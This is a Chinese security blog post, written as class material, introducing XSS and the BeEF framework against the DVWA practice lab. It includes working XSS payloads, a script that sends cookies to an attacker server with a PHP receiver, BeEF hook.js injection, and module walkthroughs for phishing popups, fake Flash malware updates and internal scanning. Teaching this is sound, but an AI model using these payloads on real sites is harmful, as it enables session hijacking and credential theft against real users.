<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="keywords" content="浅谈XSS&amp;Beef, 简简,简简博客,简简的博客,信息安全,CTF,渗透测试,Web,网络安全">
    <meta name="description" content="Xss是一种网站应用程序的安全漏洞攻击，是代码注入的一种。它允许恶意用户将代码注入到网页上，其他用户在观看网页时就会受到影响。">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
	<meta name="referrer" content="unsafe-url">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>浅谈XSS&amp;Beef | 简简</title>
    <link rel="icon" type="image/png" href="/favicon.png">
	<!--变灰-->
	<!-- <link href="https://static.isenyu.cn/file/css/MemorialDay.css"; rel="stylesheet" type="text/css" /> -->
	

    <link rel="stylesheet" type="text/css" href="https://cdn.staticfile.org/font-awesome/5.11.1/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.bootcdn.net/ajax/libs/materialize/1.0.0/css/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.bootcdn.net/ajax/libs/animate.css/3.5.1/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.bootcdn.net/ajax/libs/lightgallery/1.6.11/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">
    
    <script src="https://upcdn.b0.upaiyun.com/libs/jquery/jquery-2.0.3.min.js"></script>
    
<link rel="alternate" href="/atom.xml" title="简简" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper head-container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">简简</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories/Web" class="waves-effect waves-light">
      
      <i class="fab fa-internet-explorer" style="zoom: 0.6;"></i>
      
      <span>Web</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories/CTF" class="waves-effect waves-light">
      
      <i class="fas fa-flag" style="zoom: 0.6;"></i>
      
      <span>CTF</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="" class="waves-effect waves-light">

      
      <i class="fas fa-user-secret" style="zoom: 0.6;"></i>
      
      <span>安全</span>
      <i class="fas fa-chevron-down" aria-hidden="true" style="zoom: 0.6;"></i>
    </a>
    <ul class="sub-nav menus_item_child ">
      
      <li>
        <a href="/categories/Python/">
          
          <i class="fab fa-python" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>Python~</span>
        </a>
      </li>
      
      <li>
        <a href="/categories/工具/">
          
          <i class="fas fa-tools" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>安全工具</span>
        </a>
      </li>
      
      <li>
        <a href="/categories/信息安全/">
          
          <i class="fas fa-shield-alt" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>信息安全</span>
        </a>
      </li>
      
      <li>
        <a href="/categories/内网渗透/">
          
          <i class="fas fa-network-wired" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>内网渗透</span>
        </a>
      </li>
      
    </ul>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="" class="waves-effect waves-light">

      
      <i class="fas fa-list" style="zoom: 0.6;"></i>
      
      <span>整理</span>
      <i class="fas fa-chevron-down" aria-hidden="true" style="zoom: 0.6;"></i>
    </a>
    <ul class="sub-nav menus_item_child ">
      
      <li>
        <a href="/tags">
          
          <i class="fas fa-bookmark" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>归类</span>
        </a>
      </li>
      
      <li>
        <a href="/archives">
          
          <i class="fas fa-file-contract" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>归档</span>
        </a>
      </li>
      
    </ul>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-venus-mars" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-envelope" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-id-card-alt" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>

<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">简简</div>
        <div class="logo-desc">
            
            悄无声息地变坚强，安静地变优秀！
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories/Web" class="waves-effect waves-light">
			
			    <i class="fa-fw fab fa-internet-explorer"></i>
			
			Web
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories/CTF" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-flag"></i>
			
			CTF
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="javascript:;">
			
				<i class="fa-fw fas fa-user-secret"></i>
			
			安全
			<span class="m-icon"><i class="fas fa-chevron-right"></i></span>
		</a>
            <ul  style="background:  ;" >
              
                <li>   
				
                  <a href="/categories/Python/ " style="margin-left:50px";>
				  
				   <i class="fa fab fa-python" style="position: absolute;left:28px" ></i>
			      
		          <span>Python~</span>
                  </a>
                </li>
              
                <li>   
				
                  <a href="/categories/工具/ " style="margin-left:50px";>
				  
				   <i class="fa fas fa-tools" style="position: absolute;left:28px" ></i>
			      
		          <span>安全工具</span>
                  </a>
                </li>
              
                <li>   
				
                  <a href="/categories/信息安全/ " style="margin-left:50px";>
				  
				   <i class="fa fas fa-shield-alt" style="position: absolute;left:28px" ></i>
			      
		          <span>信息安全</span>
                  </a>
                </li>
              
                <li>   
				
                  <a href="/categories/内网渗透/ " style="margin-left:50px";>
				  
				   <i class="fa fas fa-network-wired" style="position: absolute;left:28px" ></i>
			      
		          <span>内网渗透</span>
                  </a>
                </li>
               
            </ul>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="javascript:;">
			
				<i class="fa-fw fas fa-list"></i>
			
			整理
			<span class="m-icon"><i class="fas fa-chevron-right"></i></span>
		</a>
            <ul  style="background:  ;" >
              
                <li>   
				
                  <a href="/tags " style="margin-left:50px";>
				  
				   <i class="fa fas fa-bookmark" style="position: absolute;left:28px" ></i>
			      
		          <span>归类</span>
                  </a>
                </li>
              
                <li>   
				
                  <a href="/archives " style="margin-left:50px";>
				  
				   <i class="fa fas fa-file-contract" style="position: absolute;left:28px" ></i>
			      
		          <span>归档</span>
                  </a>
                </li>
               
            </ul>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-venus-mars"></i>
			
			友链
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-envelope"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-id-card-alt"></i>
			
			关于
		</a>
          
        </li>
        
        
    </ul>
</div>

        </div>

        
    </nav>

</header>

    
<script src="https://cdn.bootcdn.net/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('猜猜密码是什么呢ヾﾉ≧∀≦)o')).toString(CryptoJS.enc.Hex)) {
                alert('哎呦！密码好像不对哟，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('https://cdn.jsdelivr.net/gh/jwt1399/cdn//img/20200824174020.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">浅谈XSS&amp;Beef</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    /*.toc-widget {
        width: 345px;
        padding-left: 20px;
    }*/
    .toc-widget {
        width: 345px;
        padding-left: 20px;
        /*目录样式修改*/
        background-color: rgb(255, 255, 255,0.7);
        border-radius: 10px;
        box-shadow: 0 10px 35px 2px rgba(0, 0, 0, .15), 0 5px 15px rgba(0, 0, 0, .07), 0 2px 5px -5px rgba(0, 0, 0, .1) !important;
    }
    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/XSS/">
                                <span class="chip bg-color">XSS</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/Web/" class="post-category">
                                Web
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-05-04
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2020-08-24
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.1k
                </div>
                

                
				
                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
            
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <center><font color="pink" size="8" weigh:500>浅谈XSS&BeEF</font></center>

<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>本文章产生的缘由是因为专业老师，让我给本专业的同学讲一哈SQL注入和XSS入门,为了备课，于是产生了这篇文章。</p>
<h2 id="一、课程目标"><a href="#一、课程目标" class="headerlink" title="一、课程目标"></a>一、课程目标</h2><blockquote>
<p>听完这节课你能学到些什么👇</p>
</blockquote>
<ul>
<li><input checked disabled type="checkbox"> 知道什么是Xss</li>
<li><input checked disabled type="checkbox"> 实现最基础的Xss</li>
<li><input checked disabled type="checkbox"> 学会使用Beef Xss工具</li>
<li><input checked disabled type="checkbox"> 了解一些Web安全基本知识</li>
</ul>
<h2 id="二、初识XSS"><a href="#二、初识XSS" class="headerlink" title="二、初识XSS"></a>二、初识XSS</h2><h3 id="1-什么是XSS攻击"><a href="#1-什么是XSS攻击" class="headerlink" title="1 什么是XSS攻击"></a>1 什么是XSS攻击</h3><p>•    XSS（Cross Site Script），跨站脚本攻击，OWASP Top10之一<br>•    向网页内嵌入恶意Java script代码</p>
<h3 id="2-XSS分类"><a href="#2-XSS分类" class="headerlink" title="2 XSS分类"></a>2 XSS分类</h3><p>•    反射型 – 前端-&gt;后端-&gt;前端<br>•    存储型 – 前端-&gt;后端-&gt;数据库-&gt;前端<br>•    DOM型 – 前端</p>
<h3 id="3-XSS常用攻击手段"><a href="#3-XSS常用攻击手段" class="headerlink" title="3 XSS常用攻击手段"></a>3 XSS常用攻击手段</h3><ul>
<li><strong>窃取网页浏览中的cookie值</strong></li>
</ul>
<p>当能够窃取到用户 Cookie 从而获取到用户身份时，攻击者可以获取到用户对网站的操作权限，从而查看用户隐私信息。</p>
<ul>
<li><strong>钓鱼欺骗</strong>：</li>
</ul>
<p>最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站，或者注入钓鱼 JavaScript 以监控目标网站的表单输入。</p>
<ul>
<li><strong>网站挂马</strong></li>
</ul>
<p>跨站时利用 IFrame 嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站上，或者弹出恶意网站窗口等方式都可以进行挂马攻击。</p>
<ul>
<li><strong>垃圾信息发送</strong></li>
</ul>
<p>比如在 SNS 社区中，利用 XSS 漏洞借用被攻击者的身份发送大量的垃圾信息给特定的目标群。</p>
<ul>
<li><strong>劫持用户 Web 行为</strong></li>
</ul>
<p>一些高级的 XSS 攻击甚至可以劫持用户的 Web 行为，监视用户的浏览历史，发送与接收的数据等等。</p>
<ul>
<li><strong>XSS 蠕虫</strong></li>
</ul>
<p>XSS 蠕虫可以用来打广告、刷流量、挂马、恶作剧、破坏网上数据、实施 DDoS 攻击等。</p>
<h2 id="三、初试XSS"><a href="#三、初试XSS" class="headerlink" title="三、初试XSS"></a>三、初试XSS</h2><h3 id="1-XSS初体验"><a href="#1-XSS初体验" class="headerlink" title="1 XSS初体验"></a>1 XSS初体验</h3><p>往DVWA靶场插入下方JS，会弹框</p>
<pre class="line-numbers language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script<span class="token operator">></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"Hi!我是简简"</span><span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>当然还可以嵌入HTML和CSS,但是用处不大</p>
<pre class="line-numbers language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>img src<span class="token operator">=</span>x onerror<span class="token operator">=</span><span class="token string">'alert("hey!")'</span><span class="token operator">></span><span class="token punctuation">;</span>

<span class="token operator">&lt;</span>h1<span class="token operator">></span>Hi<span class="token operator">!</span>我是简简<span class="token operator">&lt;</span><span class="token operator">/</span>h1<span class="token operator">></span><span class="token operator">&lt;</span>style<span class="token operator">></span>h1<span class="token punctuation">{</span>color<span class="token punctuation">:</span>pink<span class="token punctuation">;</span> text<span class="token operator">-</span>align<span class="token punctuation">:</span>center<span class="token punctuation">}</span><span class="token operator">&lt;</span>style<span class="token operator">></span>

<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">'https://jwt1399.top/medias/avatar.png'</span> width<span class="token operator">=</span>200px<span class="token punctuation">;</span>height<span class="token punctuation">:</span>200px<span class="token punctuation">;</span><span class="token operator">/</span><span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>其他操作</p>
<pre class="line-numbers language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>svg<span class="token operator">/</span>onload<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">></span>   <span class="token comment" spellcheck="true">//onload是指在加载该页面时就执行，然后观察是否有弹窗。</span>

#获取cookie
<span class="token operator">&lt;</span>script<span class="token operator">></span><span class="token function">alert</span><span class="token punctuation">(</span>document<span class="token punctuation">.</span>cookie<span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span><span class="token punctuation">;</span>

#页面跳转
<span class="token operator">&lt;</span>script<span class="token operator">></span>window<span class="token punctuation">.</span>location<span class="token punctuation">.</span>href<span class="token operator">=</span><span class="token string">"https://jwt1399.top"</span><span class="token punctuation">;</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h3 id="2-利用Xss获取cookie绕过登录验证"><a href="#2-利用Xss获取cookie绕过登录验证" class="headerlink" title="2 利用Xss获取cookie绕过登录验证"></a>2 利用Xss获取cookie绕过登录验证</h3><blockquote>
<p>web服务所使用的HTTP服务是无状态的。这就意味着，服务器无法分辨收到的请求是属于哪一个用户的，<br>需要通过cookie来对用户的身份进行标识了，用户每次对服务器发起请求时，都带上自己独有的cookie，服务器通过读取cookie信息，识别用户。</p>
</blockquote>
<p>1、首先打开1号浏览器，输入账号和密码登录DVWA,然后获取cookie</p>
<p>方法一：XSS平台</p>
<pre class="line-numbers language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script src<span class="token operator">=</span>http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>xss<span class="token punctuation">.</span>fbisb<span class="token punctuation">.</span>com<span class="token operator">/</span>ij7V<span class="token operator">></span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>方法二：自己搭建接收平台</p>
<p><strong>cookie.php</strong>（上传到自己服务器）</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token variable">$cookie</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'cookie'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token string">'cookie.txt'</span><span class="token punctuation">,</span><span class="token variable">$cookie</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter">?></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>payload:</strong></p>
<pre class="line-numbers language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script<span class="token operator">></span>document<span class="token punctuation">.</span>location<span class="token operator">=</span><span class="token string">"http://服务器ip/cookie.php?cookie="</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie<span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>获取到的 cookie 存储在 cookie.txt 中    </p>
<p>方法三：BeEF获取</p>
<p>2、然后打开2号路浏览器，进入到DVWA的login页面，在该页面利用cookie插件将cookie替换为我们获取到的1号浏览器的cookie，然后在URL栏中删掉login.php再回车</p>
<p>3、最后就可以发现未用登陆账号密码就进入了页面</p>
<p>值得注意的是：当对方进行正常logout后，再次使用该cookie是不能成功的。同时在进行替换后须在URL中进行稍许修改，因为所属的cookie不同于一个页面。</p>
<h2 id="四、BeEF"><a href="#四、BeEF" class="headerlink" title="四、BeEF"></a>四、BeEF</h2><blockquote>
<p>全称是 The Browser Exploitation Framework.  web框架攻击平台，专注于利用浏览器漏洞.BeEF是我见过的最好的xss利用框架，他同时能够配合metasploit进一步渗透主机，强大的有些吓人！！!</p>
</blockquote>
<h3 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h3><h4 id="docker安装"><a href="#docker安装" class="headerlink" title="docker安装"></a>docker安装</h4><p>docker安装得先配置docker环境</p>
<pre class="line-numbers language-bash"><code class="language-bash">docker search beef
docker pull janes/beef <span class="token comment" spellcheck="true">#拉取beef镜像</span>
docker images
docker run --rm -p 3000:3000 janes/beef <span class="token comment" spellcheck="true">#映射到本机的3000端口</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="Ubuntu"><a href="#Ubuntu" class="headerlink" title="Ubuntu"></a>Ubuntu</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true">#安装依赖</span>
<span class="token function">sudo</span> <span class="token function">apt-get</span> update
<span class="token function">sudo</span> <span class="token function">apt-get</span> <span class="token function">install</span> curl <span class="token function">git</span>
curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer <span class="token operator">|</span> <span class="token function">bash</span> -s stable
<span class="token function">source</span> ~/.rvm/scripts/rvm
rvm <span class="token function">install</span> ruby-2.3.0
rvm use 2.3.0 --default
gem <span class="token function">install</span> bundle
<span class="token comment" spellcheck="true">#安装beef</span>
<span class="token function">git</span> clone git://github.com/beefproject/beef.git
<span class="token function">cd</span> beef
bundle <span class="token function">install</span>
ruby beef<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="Kali安装"><a href="#Kali安装" class="headerlink" title="Kali安装"></a>Kali安装</h4><p>老版本的Kali自带beef,但是新版的没有</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">apt-get</span> update
<span class="token function">apt-get</span> <span class="token function">install</span> beef-xss
<span class="token comment" spellcheck="true">#第一次启动会让你设个密码(jwt)，账号为beef  #可以在/usr/share/beef-xss/config.yaml中修改</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h3 id="基础使用"><a href="#基础使用" class="headerlink" title="基础使用"></a>基础使用</h3><p>安装好之后在浏览器访问:<code>ip:3000/ui/panel</code> 默认用户名和密码都为<code>beef</code></p>
<p><img src="https://i.loli.net/2020/05/04/CHwf3xEuWYKyhms.png" alt></p>
<p><img src="https://i.loli.net/2020/05/04/sWqRwDvHuOS2TzU.png" alt></p>
<p>默认hook js：<a href="http://ip:3000/hook.js" target="_blank" rel="noopener">http://ip:3000/hook.js</a></p>
<p>默认hook页面： <a href="http://ip:3000/demos/basic.html" target="_blank" rel="noopener">http://ip:3000/demos/basic.html</a> 　　//访问即可被hook</p>
<p>往存在XSS漏洞的地方插入以下代码</p>
<pre><code>&lt;script src=&#39;ip:3000/hook.js&#39;&gt;&lt;/script&gt;;</code></pre><p><strong>举个例子</strong>🌰：往DVWA靶场插入xss代码</p>
<pre class="line-numbers language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script src<span class="token operator">=</span><span class="token string">'http://139.224.112.182:3000/hook.js'</span><span class="token operator">></span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://i.loli.net/2020/05/04/IDpXHhNgZJVj4Mu.png" alt></p>
<p>那么在beef上可以看到被嵌入hook.js的浏览器已经上线了</p>
<p><img src="https://i.loli.net/2020/05/04/tFSVqrnH6mp2GQN.png" alt></p>
<p>然后你可以选择各种攻击模块进行操作了</p>
<p><img src="https://i.loli.net/2020/05/04/M3doFeh2rwPHmQW.png" alt></p>
<p>每个模块前面的颜色代表着不同的意义</p>
<p><img src="https://i.loli.net/2020/05/04/XCh2YvfkxbJrOGR.png" alt></p>
<h3 id="实用攻击模块"><a href="#实用攻击模块" class="headerlink" title="实用攻击模块"></a>实用攻击模块</h3><p>使用下面模块的前提是你使用<code>&lt;script src=&#39;http://139.224.112.182:3000/hook.js&#39;&gt;&lt;/script&gt;;</code>控制了浏览器。</p>
<h4 id="被控浏览器弹框"><a href="#被控浏览器弹框" class="headerlink" title="被控浏览器弹框"></a>被控浏览器弹框</h4><blockquote>
<p><strong>模块：Browser—&gt;Hooked Domain—&gt;Create Alert Dialog</strong></p>
</blockquote>
<p><img src="https://i.loli.net/2020/05/04/rDFmLV2HU3XlnWY.png" alt></p>
<p><img src="https://i.loli.net/2020/05/04/Tb6ZRycfjphB1XG.png" alt></p>
<h4 id="获取cookie"><a href="#获取cookie" class="headerlink" title="获取cookie"></a>获取cookie</h4><blockquote>
<p><strong>模块：Browser—&gt;Hooked Domain—&gt;Get Cookie</strong></p>
</blockquote>
<p><img src="https://i.loli.net/2020/05/04/h2pQ8nXkMHLKlDR.png" alt></p>
<h4 id="重定向"><a href="#重定向" class="headerlink" title="重定向"></a>重定向</h4><blockquote>
<p><strong>模块：Browser—&gt;Hooked Domain—&gt;Redirect Browser</strong></p>
</blockquote>
<p>将当前页面重定向至指定页面，有可能导致当前权限丢失</p>
<p>Rediret Browser(iframe)模块：将当前页面重定向至指定页面，同时保留当前连接，可以维持当前浏览器权限</p>
<p>方法：右侧填写木马的路径，可以配合插件升级攻击</p>
<p><img src="https://i.loli.net/2020/05/04/YMiFKypA2QGOHX5.png" alt></p>
<p><img src="https://i.loli.net/2020/05/04/kjQKT1pZLO9No4z.png" alt></p>
<h4 id="社工弹窗"><a href="#社工弹窗" class="headerlink" title="社工弹窗"></a>社工弹窗</h4><blockquote>
<p><strong>模块：Social Engineering —&gt; Pretty Theft</strong></p>
</blockquote>
<p>弹出一个登录框，用户输入密码点击登录之后，beef可以获取到密码</p>
<p><img src="https://i.loli.net/2020/05/04/yOdzaUkAL3TiGZ8.png" alt></p>
<p><img src="https://i.loli.net/2020/05/04/WOGD9JBZKQ8fuaI.png" alt></p>
<p><img src="https://i.loli.net/2020/05/04/pLzr2fen1ivJqGI.png" alt></p>
<h4 id="社会工程学攻击"><a href="#社会工程学攻击" class="headerlink" title="社会工程学攻击"></a>社会工程学攻击</h4><blockquote>
<p><strong>模块：Social Engineering —&gt; Fake Flash Update</strong></p>
</blockquote>
<p>在社工这一栏，可以选择flash更新这类功能来诱使用户升级Flash，当用户点击之后，会下载我们的恶意文件执行，这样我们就可以用c2(command&amp;control)控制用户的系统.</p>
<p><img src="https://i.loli.net/2020/05/04/SnuIYFDLHN2AcB9.png" alt></p>
<p><img src="https://i.loli.net/2020/05/04/wZA7CjqGIWU5YNi.png" alt></p>
<h4 id="持久化"><a href="#持久化" class="headerlink" title="持久化"></a>持久化</h4><blockquote>
<p><strong>模块：Persistence—&gt;Create Foreground iFrame</strong></p>
</blockquote>
<p>使用之后，被控浏览器无论点击哪里，都无法跳转到该系统到其他页面</p>
<p><img src="https://i.loli.net/2020/05/04/qEusjtYSDMWgali.png" alt></p>
<h4 id="内网扫描"><a href="#内网扫描" class="headerlink" title="内网扫描"></a>内网扫描</h4><blockquote>
<p><strong>模块：Network—&gt;Port Scanner</strong></p>
</blockquote>
<p>Network用于收集内网信息，比如ping、端口扫描</p>
<h4 id="注入隐藏的iframe框架"><a href="#注入隐藏的iframe框架" class="headerlink" title="注入隐藏的iframe框架"></a>注入隐藏的iframe框架</h4><blockquote>
<p><strong>Misc –&gt; Create Invisible Frame</strong></p>
</blockquote>
<h3 id="其他模块"><a href="#其他模块" class="headerlink" title="其他模块"></a>其他模块</h3><h4 id="Simple-Hijacker模块"><a href="#Simple-Hijacker模块" class="headerlink" title="Simple Hijacker模块"></a>Simple Hijacker模块</h4><p>劫持网页上面的所有链接，当用户点击任意链接时弹出诱骗消息，如果用户接着点击会跳转到指定域名</p>
<h4 id="Clippy模块"><a href="#Clippy模块" class="headerlink" title="Clippy模块"></a>Clippy模块</h4><p>创建一个浏览器助手提示用户点击</p>
<h4 id="TabNabbing模块"><a href="#TabNabbing模块" class="headerlink" title="TabNabbing模块"></a>TabNabbing模块</h4><p>当检测用户不在当前页面时启动定时器，倒计时结束后自动重定向至指定页面</p>
<h4 id="Clickjacking模块"><a href="#Clickjacking模块" class="headerlink" title="Clickjacking模块"></a>Clickjacking模块</h4><p>可以使用multi-click clickjacking，判断当前用户鼠标位置，在不同位置可触发不同JS代码如图，鼠标后面跟随一个iframe</p>
<h4 id="Create-Pop-Under模块"><a href="#Create-Pop-Under模块" class="headerlink" title="Create Pop Under模块"></a>Create Pop Under模块</h4><p>创建一个新窗口</p>
